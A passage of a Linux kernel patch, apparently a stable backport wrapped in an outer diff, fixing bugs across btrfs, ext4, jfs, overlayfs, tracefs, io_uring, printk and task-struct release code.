+@@ -2870,7 +2877,6 @@ static int btrfs_search_path_in_tree_user(struct user_namespace *mnt_userns,
+ 				goto out_put;
+ 			}
+ 
+-			btrfs_release_path(path);
+ 			key.objectid = key.offset;
+ 			key.offset = (u64)-1;
+ 			dirid = key.objectid;
+diff --git a/fs/btrfs/ordered-data.c b/fs/btrfs/ordered-data.c
+index e54f8280031fa..bd0c7157e3878 100644
+--- a/fs/btrfs/ordered-data.c
++++ b/fs/btrfs/ordered-data.c
+@@ -580,7 +580,7 @@ void btrfs_remove_ordered_extent(struct btrfs_inode *btrfs_inode,
+ 			refcount_inc(&trans->use_count);
+ 		spin_unlock(&fs_info->trans_lock);
+ 
+-		ASSERT(trans);
++		ASSERT(trans || BTRFS_FS_ERROR(fs_info));
+ 		if (trans) {
+ 			if (atomic_dec_and_test(&trans->pending_ordered))
+ 				wake_up(&trans->pending_wait);
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index 567c5c010f931..a40ebd2321d01 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -663,6 +663,14 @@ error_free_page:
+ 	return -EINVAL;
+ }
+ 
++u8 *btrfs_sb_fsid_ptr(struct btrfs_super_block *sb)
++{
++	bool has_metadata_uuid = (btrfs_super_incompat_flags(sb) &
++				  BTRFS_FEATURE_INCOMPAT_METADATA_UUID);
++
++	return has_metadata_uuid ? sb->metadata_uuid : sb->fsid;
++}
++
+ /*
+  * Handle scanned device having its CHANGING_FSID_V2 flag set and the fs_devices
+  * being created with a disk that has already completed its fsid change. Such
+diff --git a/fs/btrfs/volumes.h b/fs/btrfs/volumes.h
+index 099def5613b87..ec2260177038e 100644
+--- a/fs/btrfs/volumes.h
++++ b/fs/btrfs/volumes.h
+@@ -757,5 +757,6 @@ int btrfs_verify_dev_extents(struct btrfs_fs_info *fs_info);
+ bool btrfs_repair_one_zone(struct btrfs_fs_info *fs_info, u64 logical);
+ 
+ bool btrfs_pinned_by_swapfile(struct btrfs_fs_info *fs_info, void *ptr);
++u8 *btrfs_sb_fsid_ptr(struct btrfs_super_block *sb);
+ 
+ #endif
+diff --git a/fs/ext2/xattr.c b/fs/ext2/xattr.c
+index 641abfa4b718a..2f89b1073307b 100644
+--- a/fs/ext2/xattr.c
++++ b/fs/ext2/xattr.c
+@@ -744,10 +744,10 @@ ext2_xattr_set2(struct inode *inode, struct buffer_head *old_bh,
+ 			/* We need to allocate a new block */
+ 			ext2_fsblk_t goal = ext2_group_first_block_no(sb,
+ 						EXT2_I(inode)->i_block_group);
+-			int block = ext2_new_block(inode, goal, &error);
++			ext2_fsblk_t block = ext2_new_block(inode, goal, &error);
+ 			if (error)
+ 				goto cleanup;
+-			ea_idebug(inode, "creating block %d", block);
++			ea_idebug(inode, "creating block %lu", block);
+ 
+ 			new_bh = sb_getblk(sb, block);
+ 			if (unlikely(!new_bh)) {
+diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
+index 6a08fc31a66de..bbfb37390723c 100644
+--- a/fs/ext4/namei.c
++++ b/fs/ext4/namei.c
+@@ -343,17 +343,17 @@ static struct ext4_dir_entry_tail *get_dirent_tail(struct inode *inode,
+ 						   struct buffer_head *bh)
+ {
+ 	struct ext4_dir_entry_tail *t;
++	int blocksize = EXT4_BLOCK_SIZE(inode->i_sb);
+ 
+ #ifdef PARANOID
+ 	struct ext4_dir_entry *d, *top;
+ 
+ 	d = (struct ext4_dir_entry *)bh->b_data;
+ 	top = (struct ext4_dir_entry *)(bh->b_data +
+-		(EXT4_BLOCK_SIZE(inode->i_sb) -
+-		 sizeof(struct ext4_dir_entry_tail)));
+-	while (d < top && d->rec_len)
++		(blocksize - sizeof(struct ext4_dir_entry_tail)));
++	while (d < top && ext4_rec_len_from_disk(d->rec_len, blocksize))
+ 		d = (struct ext4_dir_entry *)(((void *)d) +
+-		    le16_to_cpu(d->rec_len));
++		    ext4_rec_len_from_disk(d->rec_len, blocksize));
+ 
+ 	if (d != top)
+ 		return NULL;
+@@ -364,7 +364,8 @@ static struct ext4_dir_entry_tail *get_dirent_tail(struct inode *inode,
+ #endif
+ 
+ 	if (t->det_reserved_zero1 ||
+-	    le16_to_cpu(t->det_rec_len) != sizeof(struct ext4_dir_entry_tail) ||
++	    (ext4_rec_len_from_disk(t->det_rec_len, blocksize) !=
++	     sizeof(struct ext4_dir_entry_tail)) ||
+ 	    t->det_reserved_zero2 ||
+ 	    t->det_reserved_ft != EXT4_FT_DIR_CSUM)
+ 		return NULL;
+@@ -445,13 +446,14 @@ static struct dx_countlimit *get_dx_countlimit(struct inode *inode,
+ 	struct ext4_dir_entry *dp;
+ 	struct dx_root_info *root;
+ 	int count_offset;
++	int blocksize = EXT4_BLOCK_SIZE(inode->i_sb);
++	unsigned int rlen = ext4_rec_len_from_disk(dirent->rec_len, blocksize);
+ 
+-	if (le16_to_cpu(dirent->rec_len) == EXT4_BLOCK_SIZE(inode->i_sb))
++	if (rlen == blocksize)
+ 		count_offset = 8;
+-	else if (le16_to_cpu(dirent->rec_len) == 12) {
++	else if (rlen == 12) {
+ 		dp = (struct ext4_dir_entry *)(((void *)dirent) + 12);
+-		if (le16_to_cpu(dp->rec_len) !=
+-		    EXT4_BLOCK_SIZE(inode->i_sb) - 12)
++		if (ext4_rec_len_from_disk(dp->rec_len, blocksize) != blocksize - 12)
+ 			return NULL;
+ 		root = (struct dx_root_info *)(((void *)dp + 12));
+ 		if (root->reserved_zero ||
+@@ -1315,6 +1317,7 @@ static int dx_make_map(struct inode *dir, struct buffer_head *bh,
+ 	unsigned int buflen = bh->b_size;
+ 	char *base = bh->b_data;
+ 	struct dx_hash_info h = *hinfo;
++	int blocksize = EXT4_BLOCK_SIZE(dir->i_sb);
+ 
+ 	if (ext4_has_metadata_csum(dir->i_sb))
+ 		buflen -= sizeof(struct ext4_dir_entry_tail);
+@@ -1335,11 +1338,12 @@ static int dx_make_map(struct inode *dir, struct buffer_head *bh,
+ 			map_tail--;
+ 			map_tail->hash = h.hash;
+ 			map_tail->offs = ((char *) de - base)>>2;
+-			map_tail->size = le16_to_cpu(de->rec_len);
++			map_tail->size = ext4_rec_len_from_disk(de->rec_len,
++								blocksize);
+ 			count++;
+ 			cond_resched();
+ 		}
+-		de = ext4_next_entry(de, dir->i_sb->s_blocksize);
++		de = ext4_next_entry(de, blocksize);
+ 	}
+ 	return count;
+ }
+diff --git a/fs/jfs/jfs_dmap.c b/fs/jfs/jfs_dmap.c
+index bd4ef43b02033..e9d075cbd71ad 100644
+--- a/fs/jfs/jfs_dmap.c
++++ b/fs/jfs/jfs_dmap.c
+@@ -269,6 +269,7 @@ int dbUnmount(struct inode *ipbmap, int mounterror)
+ 
+ 	/* free the memory for the in-memory bmap. */
+ 	kfree(bmp);
++	JFS_SBI(ipbmap->i_sb)->bmap = NULL;
+ 
+ 	return (0);
+ }
+diff --git a/fs/jfs/jfs_imap.c b/fs/jfs/jfs_imap.c
+index 799d3837e7c2b..4899663996d81 100644
+--- a/fs/jfs/jfs_imap.c
++++ b/fs/jfs/jfs_imap.c
+@@ -193,6 +193,7 @@ int diUnmount(struct inode *ipimap, int mounterror)
+ 	 * free in-memory control structure
+ 	 */
+ 	kfree(imap);
++	JFS_IP(ipimap)->i_imap = NULL;
+ 
+ 	return (0);
+ }
+diff --git a/fs/locks.c b/fs/locks.c
+index 240b9309ed6d5..1047ab2b15e96 100644
+--- a/fs/locks.c
++++ b/fs/locks.c
+@@ -1300,6 +1300,7 @@ retry:
+  out:
+ 	spin_unlock(&ctx->flc_lock);
+ 	percpu_up_read(&file_rwsem);
++	trace_posix_lock_inode(inode, request, error);
+ 	/*
+ 	 * Free any unused locks.
+ 	 */
+@@ -1308,7 +1309,6 @@ retry:
+ 	if (new_fl2)
+ 		locks_free_lock(new_fl2);
+ 	locks_dispose_list(&dispose);
+-	trace_posix_lock_inode(inode, request, error);
+ 
+ 	return error;
+ }
+diff --git a/fs/nfsd/nfs4proc.c b/fs/nfsd/nfs4proc.c
+index a90e792a94d77..a9105e95b59c5 100644
+--- a/fs/nfsd/nfs4proc.c
++++ b/fs/nfsd/nfs4proc.c
+@@ -1029,8 +1029,8 @@ nfsd4_rename(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 			     rename->rn_tname, rename->rn_tnamelen);
+ 	if (status)
+ 		return status;
+-	set_change_info(&rename->rn_sinfo, &cstate->current_fh);
+-	set_change_info(&rename->rn_tinfo, &cstate->save_fh);
++	set_change_info(&rename->rn_sinfo, &cstate->save_fh);
++	set_change_info(&rename->rn_tinfo, &cstate->current_fh);
+ 	return nfs_ok;
+ }
+ 
+diff --git a/fs/overlayfs/copy_up.c b/fs/overlayfs/copy_up.c
+index edc1ebff33f5a..e6d711f42607b 100644
+--- a/fs/overlayfs/copy_up.c
++++ b/fs/overlayfs/copy_up.c
+@@ -580,7 +580,8 @@ static int ovl_copy_up_metadata(struct ovl_copy_up_ctx *c, struct dentry *temp)
+ 	if (err)
+ 		return err;
+ 
+-	if (inode->i_flags & OVL_COPY_I_FLAGS_MASK) {
++	if (inode->i_flags & OVL_COPY_I_FLAGS_MASK &&
++	    (S_ISREG(c->stat.mode) || S_ISDIR(c->stat.mode))) {
+ 		/*
+ 		 * Copy the fileattr inode flags that are the source of already
+ 		 * copied i_flags
+diff --git a/fs/overlayfs/file.c b/fs/overlayfs/file.c
+index 6011f955436ba..cc0c077165bde 100644
+--- a/fs/overlayfs/file.c
++++ b/fs/overlayfs/file.c
+@@ -19,7 +19,6 @@ struct ovl_aio_req {
+ 	struct kiocb iocb;
+ 	refcount_t ref;
+ 	struct kiocb *orig_iocb;
+-	struct fd fd;
+ };
+ 
+ static struct kmem_cache *ovl_aio_request_cachep;
+@@ -260,7 +259,7 @@ static rwf_t ovl_iocb_to_rwf(int ifl)
+ static inline void ovl_aio_put(struct ovl_aio_req *aio_req)
+ {
+ 	if (refcount_dec_and_test(&aio_req->ref)) {
+-		fdput(aio_req->fd);
++		fput(aio_req->iocb.ki_filp);
+ 		kmem_cache_free(ovl_aio_request_cachep, aio_req);
+ 	}
+ }
+@@ -325,10 +324,9 @@ static ssize_t ovl_read_iter(struct kiocb *iocb, struct iov_iter *iter)
+ 		if (!aio_req)
+ 			goto out;
+ 
+-		aio_req->fd = real;
+ 		real.flags = 0;
+ 		aio_req->orig_iocb = iocb;
+-		kiocb_clone(&aio_req->iocb, iocb, real.file);
++		kiocb_clone(&aio_req->iocb, iocb, get_file(real.file));
+ 		aio_req->iocb.ki_complete = ovl_aio_rw_complete;
+ 		refcount_set(&aio_req->ref, 2);
+ 		ret = vfs_iocb_iter_read(real.file, &aio_req->iocb, iter);
+@@ -396,10 +394,9 @@ static ssize_t ovl_write_iter(struct kiocb *iocb, struct iov_iter *iter)
+ 		/* Pacify lockdep, same trick as done in aio_write() */
+ 		__sb_writers_release(file_inode(real.file)->i_sb,
+ 				     SB_FREEZE_WRITE);
+-		aio_req->fd = real;
+ 		real.flags = 0;
+ 		aio_req->orig_iocb = iocb;
+-		kiocb_clone(&aio_req->iocb, iocb, real.file);
++		kiocb_clone(&aio_req->iocb, iocb, get_file(real.file));
+ 		aio_req->iocb.ki_flags = ifl;
+ 		aio_req->iocb.ki_complete = ovl_aio_rw_complete;
+ 		refcount_set(&aio_req->ref, 2);
+diff --git a/fs/tracefs/inode.c b/fs/tracefs/inode.c
+index da85b39791957..6541d917e15e1 100644
+--- a/fs/tracefs/inode.c
++++ b/fs/tracefs/inode.c
+@@ -556,6 +556,9 @@ static struct dentry *__create_dir(const char *name, struct dentry *parent,
+  */
+ struct dentry *tracefs_create_dir(const char *name, struct dentry *parent)
+ {
++	if (security_locked_down(LOCKDOWN_TRACEFS))
++		return NULL;
++
+ 	return __create_dir(name, parent, &simple_dir_inode_operations);
+ }
+ 
+diff --git a/include/linux/acpi_iort.h b/include/linux/acpi_iort.h
+index b43be0987b19e..a2a51fafa3550 100644
+--- a/include/linux/acpi_iort.h
++++ b/include/linux/acpi_iort.h
+@@ -21,6 +21,7 @@
+  */
+ #define IORT_SMMU_V3_PMCG_GENERIC        0x00000000 /* Generic SMMUv3 PMCG */
+ #define IORT_SMMU_V3_PMCG_HISI_HIP08     0x00000001 /* HiSilicon HIP08 PMCG */
++#define IORT_SMMU_V3_PMCG_HISI_HIP09     0x00000002 /* HiSilicon HIP09 PMCG */
+ 
+ int iort_register_domain_token(int trans_id, phys_addr_t base,
+ 			       struct fwnode_handle *fw_node);
+diff --git a/include/linux/bvec.h b/include/linux/bvec.h
+index 35c25dff651a5..9e3dac51eb26b 100644
+--- a/include/linux/bvec.h
++++ b/include/linux/bvec.h
+@@ -35,6 +35,21 @@ struct bio_vec {
+ 	unsigned int	bv_offset;
+ };
+ 
++/**
++ * bvec_set_page - initialize a bvec based off a struct page
++ * @bv:		bvec to initialize
++ * @page:	page the bvec should point to
++ * @len:	length of the bvec
++ * @offset:	offset into the page
++ */
++static inline void bvec_set_page(struct bio_vec *bv, struct page *page,
++		unsigned int len, unsigned int offset)
++{
++	bv->bv_page = page;
++	bv->bv_len = len;
++	bv->bv_offset = offset;
++}
++
+ struct bvec_iter {
+ 	sector_t		bi_sector;	/* device address in 512 byte
+ 						   sectors */
+diff --git a/include/linux/dma-buf.h b/include/linux/dma-buf.h
+index 71731796c8c3a..9c31f1f430d8e 100644
+--- a/include/linux/dma-buf.h
++++ b/include/linux/dma-buf.h
+@@ -627,6 +627,12 @@ int dma_buf_begin_cpu_access(struct dma_buf *dma_buf,
+ 			     enum dma_data_direction dir);
+ int dma_buf_end_cpu_access(struct dma_buf *dma_buf,
+ 			   enum dma_data_direction dir);
++struct sg_table *
++dma_buf_map_attachment_unlocked(struct dma_buf_attachment *attach,
++				enum dma_data_direction direction);
++void dma_buf_unmap_attachment_unlocked(struct dma_buf_attachment *attach,
++				       struct sg_table *sg_table,
++				       enum dma_data_direction direction);
+ 
+ int dma_buf_mmap(struct dma_buf *, struct vm_area_struct *,
+ 		 unsigned long);
+diff --git a/include/linux/instruction_pointer.h b/include/linux/instruction_pointer.h
+index cda1f706eaeb1..aa0b3ffea9353 100644
+--- a/include/linux/instruction_pointer.h
++++ b/include/linux/instruction_pointer.h
+@@ -2,7 +2,12 @@
+ #ifndef _LINUX_INSTRUCTION_POINTER_H
+ #define _LINUX_INSTRUCTION_POINTER_H
+ 
++#include <asm/linkage.h>
++
+ #define _RET_IP_		(unsigned long)__builtin_return_address(0)
++
++#ifndef _THIS_IP_
+ #define _THIS_IP_  ({ __label__ __here; __here: (unsigned long)&&__here; })
++#endif
+ 
+ #endif /* _LINUX_INSTRUCTION_POINTER_H */
+diff --git a/include/linux/libata.h b/include/linux/libata.h
+index 9713f4d8f15f4..4c9b322bb3d88 100644
+--- a/include/linux/libata.h
++++ b/include/linux/libata.h
+@@ -216,6 +216,10 @@ enum {
+ 	ATA_HOST_PARALLEL_SCAN	= (1 << 2),	/* Ports on this host can be scanned in parallel */
+ 	ATA_HOST_IGNORE_ATA	= (1 << 3),	/* Ignore ATA devices on this host. */
+ 
++	ATA_HOST_NO_PART	= (1 << 4), /* Host does not support partial */
++	ATA_HOST_NO_SSC		= (1 << 5), /* Host does not support slumber */
++	ATA_HOST_NO_DEVSLP	= (1 << 6), /* Host does not support devslp */
++
+ 	/* bits 24:31 of host->flags are reserved for LLD specific flags */
+ 
+ 	/* various lengths of time */
+diff --git a/include/linux/perf_event.h b/include/linux/perf_event.h
+index 0031f7b4d9aba..63fae3c7ae430 100644
+--- a/include/linux/perf_event.h
++++ b/include/linux/perf_event.h
+@@ -1139,15 +1139,31 @@ extern int perf_event_output(struct perf_event *event,
+ 			     struct pt_regs *regs);
+ 
+ static inline bool
+-is_default_overflow_handler(struct perf_event *event)
++__is_default_overflow_handler(perf_overflow_handler_t overflow_handler)
+ {
+-	if (likely(event->overflow_handler == perf_event_output_forward))
++	if (likely(overflow_handler == perf_event_output_forward))
+ 		return true;
+-	if (unlikely(event->overflow_handler == perf_event_output_backward))
++	if (unlikely(overflow_handler == perf_event_output_backward))
+ 		return true;
+ 	return false;
+ }
+ 
++#define is_default_overflow_handler(event) \
++	__is_default_overflow_handler((event)->overflow_handler)
++
++#ifdef CONFIG_BPF_SYSCALL
++static inline bool uses_default_overflow_handler(struct perf_event *event)
++{
++	if (likely(is_default_overflow_handler(event)))
++		return true;
++
++	return __is_default_overflow_handler(event->orig_overflow_handler);
++}
++#else
++#define uses_default_overflow_handler(event) \
++	is_default_overflow_handler(event)
++#endif
++
+ extern void
+ perf_event_header__init_id(struct perf_event_header *header,
+ 			   struct perf_sample_data *data,
+diff --git a/include/linux/sched/task.h b/include/linux/sched/task.h
+index 357e0068497c1..7291fb6399d2a 100644
+--- a/include/linux/sched/task.h
++++ b/include/linux/sched/task.h
+@@ -112,10 +112,36 @@ static inline struct task_struct *get_task_struct(struct task_struct *t)
+ }
+ 
+ extern void __put_task_struct(struct task_struct *t);
++extern void __put_task_struct_rcu_cb(struct rcu_head *rhp);
+ 
+ static inline void put_task_struct(struct task_struct *t)
+ {
+-	if (refcount_dec_and_test(&t->usage))
++	if (!refcount_dec_and_test(&t->usage))
++		return;
++
++	/*
++	 * under PREEMPT_RT, we can't call put_task_struct
++	 * in atomic context because it will indirectly
++	 * acquire sleeping locks.
++	 *
++	 * call_rcu() will schedule __put_task_struct_rcu_cb()
++	 * to be called in process context.
++	 *
++	 * __put_task_struct() is called when
++	 * refcount_dec_and_test(&t->usage) succeeds.
++	 *
++	 * This means that it can't "conflict" with
++	 * put_task_struct_rcu_user() which abuses ->rcu the same
++	 * way; rcu_users has a reference so task->usage can't be
++	 * zero after rcu_users 1 -> 0 transition.
++	 *
++	 * delayed_free_task() also uses ->rcu, but it is only called
++	 * when it fails to fork a process. Therefore, there is no
++	 * way it can conflict with put_task_struct().
++	 */
++	if (IS_ENABLED(CONFIG_PREEMPT_RT) && !preemptible())
++		call_rcu(&t->rcu, __put_task_struct_rcu_cb);
++	else
+ 		__put_task_struct(t);
+ }
+ 
+diff --git a/include/linux/usb/chipidea.h b/include/linux/usb/chipidea.h
+index ee38835ed77cc..0b4f2d5faa080 100644
+--- a/include/linux/usb/chipidea.h
++++ b/include/linux/usb/chipidea.h
+@@ -63,6 +63,7 @@ struct ci_hdrc_platform_data {
+ #define CI_HDRC_IMX_IS_HSIC		BIT(14)
+ #define CI_HDRC_PMQOS			BIT(15)
+ #define CI_HDRC_PHY_VBUS_CONTROL	BIT(16)
++#define CI_HDRC_HAS_PORTSC_PEC_MISSED	BIT(17)
+ 	enum usb_dr_mode	dr_mode;
+ #define CI_HDRC_CONTROLLER_RESET_EVENT		0
+ #define CI_HDRC_CONTROLLER_STOPPED_EVENT	1
+diff --git a/include/uapi/linux/netfilter_bridge/ebtables.h b/include/uapi/linux/netfilter_bridge/ebtables.h
+index a494cf43a7552..b0caad82b6937 100644
+--- a/include/uapi/linux/netfilter_bridge/ebtables.h
++++ b/include/uapi/linux/netfilter_bridge/ebtables.h
+@@ -182,12 +182,14 @@ struct ebt_entry {
+ 	unsigned char sourcemsk[ETH_ALEN];
+ 	unsigned char destmac[ETH_ALEN];
+ 	unsigned char destmsk[ETH_ALEN];
+-	/* sizeof ebt_entry + matches */
+-	unsigned int watchers_offset;
+-	/* sizeof ebt_entry + matches + watchers */
+-	unsigned int target_offset;
+-	/* sizeof ebt_entry + matches + watchers + target */
+-	unsigned int next_offset;
++	__struct_group(/* no tag */, offsets, /* no attrs */,
++		/* sizeof ebt_entry + matches */
++		unsigned int watchers_offset;
++		/* sizeof ebt_entry + matches + watchers */
++		unsigned int target_offset;
++		/* sizeof ebt_entry + matches + watchers + target */
++		unsigned int next_offset;
++	);
+ 	unsigned char elems[0] __attribute__ ((aligned (__alignof__(struct ebt_replace))));
+ };
+ 
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 7245218fdbe2b..9fe1aada3ad00 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -170,6 +170,10 @@ static int io_setup_async_msg(struct io_kiocb *req,
+ 	memcpy(async_msg, kmsg, sizeof(*kmsg));
+ 	if (async_msg->msg.msg_name)
+ 		async_msg->msg.msg_name = &async_msg->addr;
++
++	if ((req->flags & REQ_F_BUFFER_SELECT) && !async_msg->msg.msg_iter.nr_segs)
++		return -EAGAIN;
++
+ 	/* if were using fast_iov, set it to the new one */
+ 	if (!kmsg->free_iov) {
+ 		size_t fast_idx = kmsg->msg.msg_iter.iov - kmsg->fast_iov;
+@@ -529,6 +533,7 @@ static int io_recvmsg_copy_hdr(struct io_kiocb *req,
+ 			       struct io_async_msghdr *iomsg)
+ {
+ 	iomsg->msg.msg_name = &iomsg->addr;
++	iomsg->msg.msg_iter.nr_segs = 0;
+ 
+ #ifdef CONFIG_COMPAT
+ 	if (req->ctx->compat)
+diff --git a/kernel/fork.c b/kernel/fork.c
+index 41950ff90aa34..85617928041cf 100644
+--- a/kernel/fork.c
++++ b/kernel/fork.c
+@@ -852,6 +852,14 @@ void __put_task_struct(struct task_struct *tsk)
+ }
+ EXPORT_SYMBOL_GPL(__put_task_struct);
+ 
++void __put_task_struct_rcu_cb(struct rcu_head *rhp)
++{
++	struct task_struct *task = container_of(rhp, struct task_struct, rcu);
++
++	__put_task_struct(task);
++}
++EXPORT_SYMBOL_GPL(__put_task_struct_rcu_cb);
++
+ void __init __weak arch_task_cache_init(void) { }
+ 
+ /*
+diff --git a/kernel/panic.c b/kernel/panic.c
+index ca5452afb456d..63e94f3bd8dcd 100644
+--- a/kernel/panic.c
++++ b/kernel/panic.c
+@@ -695,6 +695,7 @@ void warn_slowpath_fmt(const char *file, int line, unsigned taint,
+ 	if (!fmt) {
+ 		__warn(file, line, __builtin_return_address(0), taint,
+ 		       NULL, NULL);
++		warn_rcu_exit(rcu);
+ 		return;
+ 	}
+ 
+diff --git a/kernel/printk/printk.c b/kernel/printk/printk.c
+index e4f1e7478b521..cc53fb77f77cc 100644
+--- a/kernel/printk/printk.c
++++ b/kernel/printk/printk.c
+@@ -2269,7 +2269,11 @@ asmlinkage int vprintk_emit(int facility, int level,
+ 		preempt_enable();
+ 	}
+ 
+-	wake_up_klogd();
++	if (in_sched)
++		defer_console_output();
++	else
++		wake_up_klogd();
++
+ 	return printed_len;
+ }
+ EXPORT_SYMBOL(vprintk_emit);
+@@ -2552,6 +2556,25 @@ static int console_cpu_notify(unsigned int cpu)
+ 	return 0;
+ }
+ 
++/*
++ * Return true when this CPU should unlock console_sem without pushing all
++ * messages to the console. This reduces the chance that the console is
++ * locked when the panic CPU tries to use it.
++ */
++static bool abandon_console_lock_in_panic(void)
++{
++	if (!panic_in_progress())
++		return false;
++
++	/*
++	 * We can use raw_smp_processor_id() here because it is impossible for
++	 * the task to be migrated to the panic_cpu, or away from it. If
++	 * panic_cpu has already been set, and we're not currently executing on
++	 * that CPU, then we never will be.
++	 */
++	return atomic_read(&panic_cpu) != raw_smp_processor_id();
++}
++
+ /**
+  * console_lock - lock the console system for exclusive use.
+  *
+@@ -2564,6 +2587,10 @@ void console_lock(void)
+ {
+ 	might_sleep();
+ 
++	/* On panic, the console_lock must be left to the panic cpu. */
++	while (abandon_console_lock_in_panic())
++		msleep(1000);
++
+ 	down_console_sem();
+ 	if (console_suspended)
+ 		return;
+@@ -2582,6 +2609,9 @@ EXPORT_SYMBOL(console_lock);
+  */
+ int console_trylock(void)
+ {
++	/* On panic, the console_lock must be left to the panic cpu. */
++	if (abandon_console_lock_in_panic())
++		return 0;
+ 	if (down_trylock_console_sem())
+ 		return 0;
+ 	if (console_suspended) {
+@@ -2600,25 +2630,6 @@ int is_console_locked(void)
+ }
+ EXPORT_SYMBOL(is_console_locked);
+ 
+-/*
+- * Return true when this CPU should unlock console_sem without pushing all
+- * messages to the console. This reduces the chance that the console is
+- * locked when the panic CPU tries to use it.
+- */
+-static bool abandon_console_lock_in_panic(void)
+-{
+-	if (!panic_in_progress())
+-		return false;
+-
+-	/*
+-	 * We can use raw_smp_processor_id() here because it is impossible for
+-	 * the task to be migrated to the panic_cpu, or away from it. If
+-	 * panic_cpu has already been set, and we're not currently executing on
+-	 * that CPU, then we never will be.
+-	 */
+-	return atomic_read(&panic_cpu) != raw_smp_processor_id();
+-}
+-
+ /*
+  * Check if the given console is currently capable and allowed to print
+  * records.
+@@ -3483,11 +3494,33 @@ static void __wake_up_klogd(int val)
+ 	preempt_enable();
+ }
+ 
++/**
++ * wake_up_klogd - Wake kernel logging daemon
++ *
++ * Use this function when new records have been added to the ringbuffer
++ * and the console printing of those records has already occurred or is
++ * known to be handled by some other context. This function will only
++ * wake the logging daemon.
++ *
++ * Context: Any context.
++ */
+ void wake_up_klogd(void)
+ {
+ 	__wake_up_klogd(PRINTK_PENDING_WAKEUP);
+ }
+ 
++/**
++ * defer_console_output - Wake kernel logging daemon and trigger
++ *	console printing in a deferred context
++ *
++ * Use this function when new records have been added to the ringbuffer and
++ * this context is responsible for console printing those records, but
++ * the current context is not allowed to perform the console printing.
++ * Trigger an irq_work context to perform the console printing. This
++ * function also wakes the logging daemon.
++ *
++ * Context: Any context.
++ */
+ void defer_console_output(void)
+ {
+ 	/*
+@@ -3504,12 +3537,7 @@ void printk_trigger_flush(void)
+ 
+ int vprintk_deferred(const char *fmt, va_list args)
+ {
+-	int r;
+-
+-	r = vprintk_emit(0, LOGLEVEL_SCHED, NULL, fmt, args);
+-	defer_console_output();
+-
+-	return r;
++	return vprintk_emit(0, LOGLEVEL_SCHED, NULL, fmt, args);
+ }
+ 
+ int _printk_deferred(const char *fmt, ...)
+diff --git a/kernel/printk/printk_safe.c b/kernel/printk/printk_safe.c
+index ef0f9a2044da1..6d10927a07d83 100644
+--- a/kernel/printk/printk_safe.c
++++ b/kernel/printk/printk_safe.c
+@@ -38,13 +38,8 @@ asmlinkage int vprintk(const char *fmt, va_list args)
+ 	 * Use the main logbuf even in NMI. But avoid calling console
+ 	 * drivers that might have their own locks.
+ 	 */
+-	if (this_cpu_read(printk_context) || in_nmi()) {
+-		int len;
+-
+-		len = vprintk_store(0, LOGLEVEL_DEFAULT, NULL, fmt, args);
+-		defer_console_output();
+-		return len;
+-	}
++	if (this_cpu_read(printk_context) || in_nmi())
++		return vprintk_deferred(fmt, args);
+ 
+ 	/* No obstacles. */
+ 	return vprintk_default(fmt, args);
+diff --git a/kernel/rcu/rcuscale.c b/kernel/rcu/rcuscale.c
+index 7854dc3226e1b..0b88d96511adc 100644
+--- a/kernel/rcu/rcuscale.c
++++ b/kernel/rcu/rcuscale.c
+@@ -423,7 +423,7 @@ rcu_scale_writer(void *arg)
+ 	sched_set_fifo_low(current);
+ 
+ 	if (holdoff)
+-		schedule_timeout_uninterruptible(holdoff * HZ);
++		schedule_timeout_idle(holdoff * HZ);
+ 
+ 	/*
+ 	 * Wait until rcu_end_inkernel_boot() is called for normal GP tests
+diff --git a/kernel/scftorture.c b/kernel/scftorture.c
+index 5d113aa59e773..83c33ba0ca7e0 100644
+--- a/kernel/scftorture.c
++++ b/kernel/scftorture.c
+@@ -171,7 +171,8 @@ static void scf_torture_stats_print(void)
+ 		scfs.n_all_wait += scf_stats_p[i].n_all_wait;
+ 	}
+ 	if (atomic_read(&n_errs) || atomic_read(&n_mb_in_errs) ||
+-	    atomic_read(&n_mb_out_errs) || atomic_read(&n_alloc_errs))
++	    atomic_read(&n_mb_out_errs) ||
++	    (!IS_ENABLED(CONFIG_KASAN) && atomic_read(&n_alloc_errs)))
+ 		bangstr = "!!! ";
+ 	pr_alert("%s %sscf_invoked_count %s: %lld resched: %lld single: %lld/%lld single_ofl: %lld/%lld single_rpc: %lld single_rpc_ofl: %lld many: %lld/%lld all: %lld/%lld ",
+ 		 SCFTORT_FLAG, bangstr, isdone ? "VER" : "ver", invoked_count, scfs.n_resched,
+@@ -323,7 +324,8 @@ static void scftorture_invoke_one(struct scf_statistics *scfp, struct torture_ra
+ 		preempt_disable();
+ 	if (scfsp->scfs_prim == SCF_PRIM_SINGLE || scfsp->scfs_wait) {
+ 		scfcp = kmalloc(sizeof(*scfcp), GFP_ATOMIC);
+-		if (WARN_ON_ONCE(!scfcp)) {
++		if (!scfcp) {
++			WARN_ON_ONCE(!IS_ENABLED(CONFIG_KASAN));
+ 			atomic_inc(&n_alloc_errs);
+ 		} else {
+ 			scfcp->scfc_cpu = -1;
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 54ccdca395311..9db92a6e14636 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -1729,7 +1729,7 @@ static void trace_create_maxlat_file(struct trace_array *tr,
+ 	init_irq_work(&tr->fsnotify_irqwork, latency_fsnotify_workfn_irq);
+ 	tr->d_max_latency = trace_create_file("tracing_max_latency",
+ 					      TRACE_MODE_WRITE,
+-					      d_tracer, &tr->max_latency,
++					      d_tracer, tr,
+ 					      &tracing_max_lat_fops);
+ }
+ 
+@@ -1762,7 +1762,7 @@ void latency_fsnotify(struct trace_array *tr)
+ 
+ #define trace_create_maxlat_file(tr, d_tracer)				\
+ 	trace_create_file("tracing_max_latency", TRACE_MODE_WRITE,	\
+-			  d_tracer, &tr->max_latency, &tracing_max_lat_fops)
++			  d_tracer, tr, &tracing_max_lat_fops)
+ 
+ #endif
+ 
+@@ -4899,6 +4899,33 @@ int tracing_open_generic_tr(struct inode *inode, struct file *filp)
+ 	return 0;
+ }
+ 
++/*
++ * The private pointer of the inode is the trace_event_file.
++ * Update the tr ref count associated to it.
++ */
++int tracing_open_file_tr(struct inode *inode, struct file *filp)
++{
++	struct trace_event_file *file = inode->i_private;
++	int ret;
++
++	ret = tracing_check_open_get_tr(file->tr);
++	if (ret)
++		return ret;
++
++	filp->private_data = inode->i_private;
